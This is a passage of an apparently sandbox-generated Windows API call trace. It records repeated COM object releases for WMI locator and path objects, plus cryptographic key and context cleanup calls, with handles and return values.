pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.220] WbemLocator:IUnknown:Release (This=0x6736f58) returned 0x1 [0139.220] WbemLocator:IUnknown:Release (This=0x6736f58) returned 0x0 [0139.220] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0139.220] WbemLocator:IUnknown:Release (This=0x6736f18) returned 0x1 [0139.220] WbemLocator:IUnknown:Release (This=0x6736f18) returned 0x0 [0139.221] IUnknown:Release (This=0x673afa0) returned 0x0 [0144.450] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0144.450] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0144.450] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0144.450] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0144.972] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0144.972] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0144.972] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0144.972] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0144.972] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0144.972] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0144.972] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x0 [0144.972] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0144.972] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0144.972] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x1 [0144.972] WbemLocator:IUnknown:Release (This=0x673969c) returned 0x0 [0145.104] IUnknown:Release (This=0x673afa0) returned 0x0 [0147.355] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0147.355] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0147.355] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0147.355] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0147.355] CryptDestroyKey (hKey=0x77b1f0) returned 1 [0147.355] CryptReleaseContext (hProv=0x6ee6b8, dwFlags=0x0) returned 1 [0147.355] CryptReleaseContext (hProv=0x6ee6b8, dwFlags=0x0) returned 1 [0147.355] CryptDestroyKey (hKey=0x77b3b0) returned 1 [0147.355] CryptReleaseContext (hProv=0x6ee960, dwFlags=0x0) returned 1 [0147.356] CryptReleaseContext (hProv=0x6ee960, dwFlags=0x0) returned 1 [0147.356] CryptDestroyKey (hKey=0x77b330) returned 1 [0147.356] CryptReleaseContext (hProv=0x6ee498, dwFlags=0x0) returned 1 [0147.356] CryptReleaseContext (hProv=0x6ee498, dwFlags=0x0) returned 1 [0149.055] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0149.055] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.055] WbemLocator:IUnknown:Release (This=0x6736ea8) returned 0x1 [0149.055] WbemLocator:IUnknown:Release (This=0x6736ea8) returned 0x0 [0149.055] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.055] WbemLocator:IUnknown:Release (This=0x6737018) returned 0x1 [0149.055] WbemLocator:IUnknown:Release (This=0x6737018) returned 0x0 [0149.055] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.055] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x1 [0149.055] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x0 [0149.055] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.055] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x1 [0149.055] WbemLocator:IUnknown:Release (This=0x6736db8) returned 0x0 [0149.056] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.056] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x1 [0149.056] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x0 [0149.056] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0149.056] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x1 [0149.056] WbemLocator:IUnknown:Release (This=0x6736e78) returned 0x0 [0149.056] IUnknown:Release (This=0x673b2d0) returned 0x0 [0149.056] IUnknown:Release (This=0x673b138) returned 0x0 [0149.057] CryptDestroyKey (hKey=0x77ac30) returned 1 [0149.057] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0149.057] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0151.724] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0151.724] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0151.724] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x1 [0151.724] WbemLocator:IUnknown:Release (This=0x6737078) returned 0x0 [0151.724] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0151.724] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x1 [0151.724] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x0 [0151.724] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0151.724] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x1 [0151.725] WbemLocator:IUnknown:Release (This=0x6736e18) returned 0x0 [0151.725] CryptDestroyKey (hKey=0x77ac30) returned 1 [0151.725] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0151.726] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0151.726] CryptDestroyKey (hKey=0x77b1b0) returned 1 [0151.726] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0151.726] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0156.683] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0156.683] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0156.683] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x1 [0156.683] WbemLocator:IUnknown:Release (This=0x6736d98) returned 0x0 [0156.683] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0156.683] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x1 [0156.683] WbemLocator:IUnknown:Release (This=0x6736fb8) returned 0x0 [0156.683] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0156.683] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x1 [0156.683] WbemLocator:IUnknown:Release (This=0x6737028) returned 0x0 [0156.684] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0156.684] CryptDestroyKey (hKey=0x77b4f0) returned 1 [0156.684] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0156.684] CryptReleaseContext (hProv=0x7a8f58, dwFlags=0x0) returned 1 [0156.685] CryptDestroyKey (hKey=0x77b2f0) returned 1 [0156.685] CryptReleaseContext (hProv=0x6eed18, dwFlags=0x0) returned 1 [0157.808] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0157.808] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.808] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0157.808] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x0 [0157.808] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.808] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0157.808] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x0 [0157.808] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.808] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0157.809] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x0 [0157.809] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.809] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0157.809] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0157.809] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.809] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0157.809] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x0 [0157.809] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.809] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0157.809] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x0 [0157.809] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0157.809] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.809] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x1 [0157.809] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x0 [0157.889] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0157.889] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0157.892] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x0 [0158.160] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0158.160] WbemLocator:IUnknown:Release (This=0x780fc4) returned 0x1 [0158.160] WbemLocator:IUnknown:Release (This=0x673af74) returned 0x0 [0158.161] IUnknown:Release (This=0x673bac8) returned 0x0 [0158.161] IUnknown:Release (This=0x673b2d0) returned 0x0 [0158.162] IUnknown:Release (This=0x673b798) returned 0x0 [0158.162] IUnknown:Release (This=0x673b600) returned 0x0 [0158.162] IUnknown:Release (This=0x673afa0) returned 0x0 [0158.162] IUnknown:Release (This=0x673b468) returned 0x0 [0158.162] IUnknown:Release (This=0x673b930) returned 0x0 [0158.162] IUnknown:Release (This=0x673b138) returned 0x0 [0158.162] CryptReleaseContext (hProv=0x6ee300, dwFlags=0x0) returned 1 [0158.163] CryptReleaseContext (hProv=0x6ee740, dwFlags=0x0) returned 1 [0158.163] CryptDestroyKey (hKey=0x77b070) returned 1 [0158.163] CryptReleaseContext (hProv=0x6ee300, dwFlags=0x0) returned 1 [0158.164] CryptDestroyKey (hKey=0x77b170) returned 1 [0158.164] CryptReleaseContext (hProv=0x6ee740, dwFlags=0x0) returned 1 [0158.166] CryptDestroyKey (hKey=0x77b0f0) returned 1 [0158.166] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0158.166] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0166.277] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0166.277] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0166.277] WbemLocator:IUnknown:Release (This=0x6736e98) returned 0x1 [0166.277] WbemLocator:IUnknown:Release (This=0x6736e98) returned 0x0 [0166.277] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0166.277] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x1 [0166.277] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x0 [0166.277] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0166.277] WbemLocator:IUnknown:Release (This=0x6736f08) returned 0x1 [0166.278] WbemLocator:IUnknown:Release (This=0x6736f08) returned 0x0 [0166.278] IUnknown:Release (This=0x673b468) returned 0x0 [0166.278] CryptDestroyKey (hKey=0x77b0f0) returned 1 [0166.278] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0166.278] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0166.278] CryptDestroyKey (hKey=0x77b130) returned 1 [0166.278] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0166.278] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0179.916] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0179.916] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.916] WbemLocator:IUnknown:Release (This=0x67373d0) returned 0x1 [0179.916] WbemLocator:IUnknown:Release (This=0x67373d0) returned 0x0 [0179.916] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.916] WbemLocator:IUnknown:Release (This=0x67370b8) returned 0x1 [0179.916] WbemLocator:IUnknown:Release (This=0x67370b8) returned 0x0 [0179.916] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.916] WbemLocator:IUnknown:Release (This=0x6737410) returned 0x1 [0179.916] WbemLocator:IUnknown:Release (This=0x6737410) returned 0x0 [0179.917] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.917] WbemLocator:IUnknown:Release (This=0x67370d8) returned 0x1 [0179.917] WbemLocator:IUnknown:Release (This=0x67370d8) returned 0x0 [0179.917] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.917] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x1 [0179.917] WbemLocator:IUnknown:Release (This=0x6742f74) returned 0x0 [0179.997] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.997] WbemLocator:IUnknown:Release (This=0x781474) returned 0x1 [0179.997] WbemLocator:IUnknown:Release (This=0x6742f1c) returned 0x0 [0179.997] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.997] WbemLocator:IUnknown:Release (This=0x6737390) returned 0x1 [0179.997] WbemLocator:IUnknown:Release (This=0x6737390) returned 0x0 [0179.997] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.997] WbemLocator:IUnknown:Release (This=0x781834) returned 0x1 [0179.998] WbemLocator:IUnknown:Release (This=0x6742ec4) returned 0x0 [0179.998] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.998] WbemLocator:IUnknown:Release (This=0x7811a4) returned 0x1 [0179.998] WbemLocator:IUnknown:Release (This=0x67371c4) returned 0x0 [0179.999] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.999] WbemLocator:IUnknown:Release (This=0x6737330) returned 0x1 [0179.999] WbemLocator:IUnknown:Release (This=0x6737330) returned 0x0 [0179.999] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.999] WbemLocator:IUnknown:Release (This=0x6737118) returned 0x1 [0179.999] WbemLocator:IUnknown:Release (This=0x6737118) returned 0x0 [0179.999] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0179.999] WbemLocator:IUnknown:Release (This=0x781294) returned 0x1 [0179.999] WbemLocator:IUnknown:Release (This=0x673721c) returned 0x0 [0180.000] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.000] WbemLocator:IUnknown:Release (This=0x781744) returned 0x1 [0180.000] WbemLocator:IUnknown:Release (This=0x67372cc) returned 0x0 [0180.000] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.000] WbemLocator:IUnknown:Release (This=0x7810b4) returned 0x1 [0180.000] WbemLocator:IUnknown:Release (This=0x672ccec) returned 0x0 [0180.001] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.001] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x1 [0180.001] WbemLocator:IUnknown:Release (This=0x672099c) returned 0x0 [0180.001] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.001] WbemLocator:IUnknown:Release (This=0x781384) returned 0x1 [0180.002] WbemLocator:IUnknown:Release (This=0x6737274) returned 0x0 [0180.002] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.002] WbemLocator:IUnknown:Release (This=0x6737430) returned 0x1 [0180.002] WbemLocator:IUnknown:Release (This=0x6737430) returned 0x0 [0180.002] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.002] WbemLocator:IUnknown:Release (This=0x6737450) returned 0x1 [0180.002] WbemLocator:IUnknown:Release (This=0x6737450) returned 0x0 [0180.002] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737dd0) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737e40) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6737f90) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738000) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738070) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x67380e0) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x6738150) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.003] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x1 [0180.003] WbemDefPath:IUnknown:Release (This=0x67381c0) returned 0x0 [0180.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x6737eb0) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738230) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x67382a0) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x67384d0) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738540) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x6737f20) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738310) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x1 [0180.004] WbemDefPath:IUnknown:Release (This=0x67385b0) returned 0x0 [0180.004] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.004] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x1 [0180.005] WbemDefPath:IUnknown:Release (This=0x6738380) returned 0x0 [0180.005] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0180.005] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x1 [0180.005] WbemDefPath:IUnknown:Release (This=0x67383f0) returned 0x0 [0180.006] IUnknown:Release (This=0x673bc60) returned 0x0 [0180.006] IUnknown:Release (This=0x673b930) returned 0x0 [0180.006] IUnknown:Release (This=0x673b2d0) returned 0x0 [0180.007] IUnknown:Release (This=0x673b798) returned 0x0 [0180.007] IUnknown:Release (This=0x673afa0) returned 0x0 [0180.007] IUnknown:Release (This=0x673b600) returned 0x0 [0180.007] IUnknown:Release (This=0x673b138) returned 0x0 [0180.007] IUnknown:Release (This=0x673b468) returned 0x0 [0180.195] CryptDestroyKey (hKey=0x77af70) returned 1 [0180.195] CryptReleaseContext (hProv=0x7a9e38, dwFlags=0x0) returned 1 [0180.195] CryptReleaseContext (hProv=0x7a9e38, dwFlags=0x0) returned 1 [0180.196] CryptDestroyKey (hKey=0x77b3b0) returned 1 [0180.196] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0180.196] CryptReleaseContext (hProv=0x6eec90, dwFlags=0x0) returned 1 [0180.197] CryptDestroyKey (hKey=0x77b430) returned 1 [0180.197] CryptReleaseContext (hProv=0x6ee058, dwFlags=0x0) returned 1 [0180.197] CryptDestroyKey (hKey=0x77b070) returned 1 [0180.197] CryptReleaseContext (hProv=0x7aa300, dwFlags=0x0) returned 1 [0180.197] CryptReleaseContext (hProv=0x7aa300, dwFlags=0x0) returned 1 [0180.197] CryptReleaseContext (hProv=0x6ee058, dwFlags=0x0) returned 1 [0180.200] CryptDestroyKey (hKey=0x77abf0) returned 1 [0180.200] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0180.200] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0189.428] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0189.428] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.428] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x1 [0189.428] WbemDefPath:IUnknown:Release (This=0x67389a0) returned 0x0 [0189.428] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738930) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x0 [0189.429] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0189.429] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0189.430] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0189.430] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.430] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x1 [0189.430] WbemLocator:IUnknown:Release (This=0x672ef9c) returned 0x0 [0189.649] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.649] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0189.649] WbemLocator:IUnknown:Release (This=0x672eff4) returned 0x0 [0189.649] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.649] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0189.649] WbemLocator:IUnknown:Release (This=0x6742fcc) returned 0x0 [0189.691] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0189.691] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x1 [0189.691] WbemLocator:IUnknown:Release (This=0x672f0a4) returned 0x0 [0190.270] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0190.270] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0190.270] WbemLocator:IUnknown:Release (This=0x672f04c) returned 0x0 [0190.395] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0190.395] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0190.395] WbemLocator:IUnknown:Release (This=0x6730d0c) returned 0x0 [0190.396] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0190.396] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0190.396] WbemLocator:IUnknown:Release (This=0x672cc94) returned 0x0 [0190.396] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0190.396] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0190.396] WbemLocator:IUnknown:Release (This=0x6730cb4) returned 0x0 [0190.397] IUnknown:Release (This=0x673bf90) returned 0x0 [0190.397] IUnknown:Release (This=0x673c128) returned 0x0 [0190.397] IUnknown:Release (This=0x673bac8) returned 0x0 [0190.398] IUnknown:Release (This=0x673c2c0) returned 0x0 [0190.398] IUnknown:Release (This=0x673bdf8) returned 0x0 [0192.003] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0192.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0192.003] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0192.003] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0192.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0192.003] WbemLocator:IUnknown:Release 